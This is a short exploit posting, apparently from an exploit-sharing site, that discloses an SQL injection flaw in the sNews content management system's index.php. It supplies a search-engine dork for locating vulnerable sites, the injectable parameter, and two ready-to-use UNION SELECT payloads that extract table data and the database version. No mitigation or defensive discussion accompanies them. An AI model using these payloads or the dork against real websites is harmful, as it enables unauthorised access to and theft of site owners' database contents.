sNews (index.php) SQL Injection Vulnerability

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
Dork: "Powered by sNews"

===================================================

[+] Vulnerable File :
http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
====================================================

Referensi : Inj3ct0r.com